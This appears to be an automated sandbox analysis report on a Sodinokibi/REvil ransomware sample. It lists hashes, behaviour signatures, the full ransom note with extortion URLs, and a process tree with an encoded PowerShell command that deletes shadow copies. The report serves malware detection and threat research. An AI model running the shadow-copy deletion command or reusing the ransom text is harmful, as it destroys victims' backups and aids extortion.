Analysis

  • max time kernel
    120s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 07:56

General

  • Target

    23d96b2a01d190a2146849c6cfe59fea9f3c6c6a8f71367dacaf89d3fa1ac51c.exe

  • Size

    165KB

  • MD5

    46357f434f7a6af45d039812360c5fb4

  • SHA1

    413637aa0d885aa3f35aef237d04c549d74b1d89

  • SHA256

    23d96b2a01d190a2146849c6cfe59fea9f3c6c6a8f71367dacaf89d3fa1ac51c

  • SHA512

    b48c571d0bc28eae58426eebee334baa49a78eb6f19a2efc31997233cd97caa914356657980222e0acf9eb982b45978ab103168c11f5a5964edce628816b3089

Score
10/10

Malware Config

Extracted

Path

C:\fm13y283-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension fm13y283. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E0066B6C34257BA3 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E0066B6C34257BA3 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: bpvP3vo0rHE25tUE5WJReyuKgsNFAbsQBhreq9HYqxPWa2zaEJdLnxMUbmhzk61U fapBWy3oPFQn+v1Ere0WpyIGPEByUo2Cf2SI/K2e40eOM5AIDwwrnMSQR+ep5qw3 szA/PDPIq+HyN7O/PiyESP3cYYUWFjisU+botY85oC/4AkRWO9i2+wYog4EWoOkN V3AJi1PT8KQHqvnt8eTSEZkRWwnV8Pv4LLvfgGSFIcryThT7FHiAkFs4ak5TpZpZ 8hJkv9iNRJqFHyvhtJD31sAsJ+4C1VGo1CzpgE1kJshtabGu+Swm8wdZw4I28K3d mK0rm6f6sAd+/0tQxBBMCAXzPmWM5j7D/sIHvpKrYx0o4cYhPj+HO4ya6iFbyA98 QsWUbnD3qS1K4zbX2pypJz/75ayWp1GU7+yE1tPkpuGX49Yque1haBZfsYeJGYxH 6tmZDNCa3fzvgRn0gTBYmOHbgrftDrLboz4JKru9OBgeYzthSwKaV0QswbTcZD46 1qJy7lUJZ83O/edyPM6tsfxL2yZb2lo5hfNw+2O0FQTi9JDQko/fkwVlWF1ydqNs sFea2ETZZM+K4QDxXPPEmT6r8flIil9azWc7D3QURXmT42i9P99eWizfirVfkADp TBdBhiFnzaohINHaJHjHwZm0KXmnGjr9ETyQd4uClVbnqfvzh+tRouPf0BDla5ZV gDANs1cUkQK9tZLfTy1AJCj/aeHbfrgAeNSOQ0WS4j6gfGmlBaN7/d5QDXwjLEBK Uazjh6Ts1nd5gwyinCKxlBDw7oBfD0dlwQLmeF5QxtwWnrHQR9H/kSeH+YTN9Iji 3yE+siDwJs46ZZ2Lo2dfdPXdHsLKUKz2j4tagUioLBjYjzaXCNEGoKxN+7vOY1HO JIbY/KkaLqIBW4kj3cb6hp8sEBwYEawCI1j4Y7iY4d1OpX/Zt2Ydd49KWEOkZ0xo lqaNICYKT8c+OwiREWepZwFj0xMjRieidGMVkhJ1Ys930Z76Me/Un2t60LCekPry pfeExdztx2c9gRFdATGm+mPfRbiwmEH7YIDcc+/xCcLym4/EL4fVJ469nxGA860K YgQAD5luLSaZKMz6NjX5JS3++B8+vCN1VZqiANjurX22sx1yMRF8WTWTBpMQfiUm pGpSseMLG10= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E0066B6C34257BA3

http://decryptor.cc/E0066B6C34257BA3

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\23d96b2a01d190a2146849c6cfe59fea9f3c6c6a8f71367dacaf89d3fa1ac51c.exe
    "C:\Users\Admin\AppData\Local\Temp\23d96b2a01d190a2146849c6cfe59fea9f3c6c6a8f71367dacaf89d3fa1ac51c.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1752
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:616
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1652

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1736-54-0x0000000076911000-0x0000000076913000-memory.dmp
      Filesize

      8KB

    • memory/1752-55-0x000007FEFC061000-0x000007FEFC063000-memory.dmp
      Filesize

      8KB

    • memory/1752-57-0x0000000002820000-0x0000000002822000-memory.dmp
      Filesize

      8KB

    • memory/1752-59-0x0000000002824000-0x0000000002827000-memory.dmp
      Filesize

      12KB

    • memory/1752-58-0x0000000002822000-0x0000000002824000-memory.dmp
      Filesize

      8KB

    • memory/1752-56-0x000007FEF3160000-0x000007FEF3CBD000-memory.dmp
      Filesize

      11.4MB

    • memory/1752-60-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
      Filesize

      3.0MB

    • memory/1752-61-0x000000000282B000-0x000000000284A000-memory.dmp
      Filesize

      124KB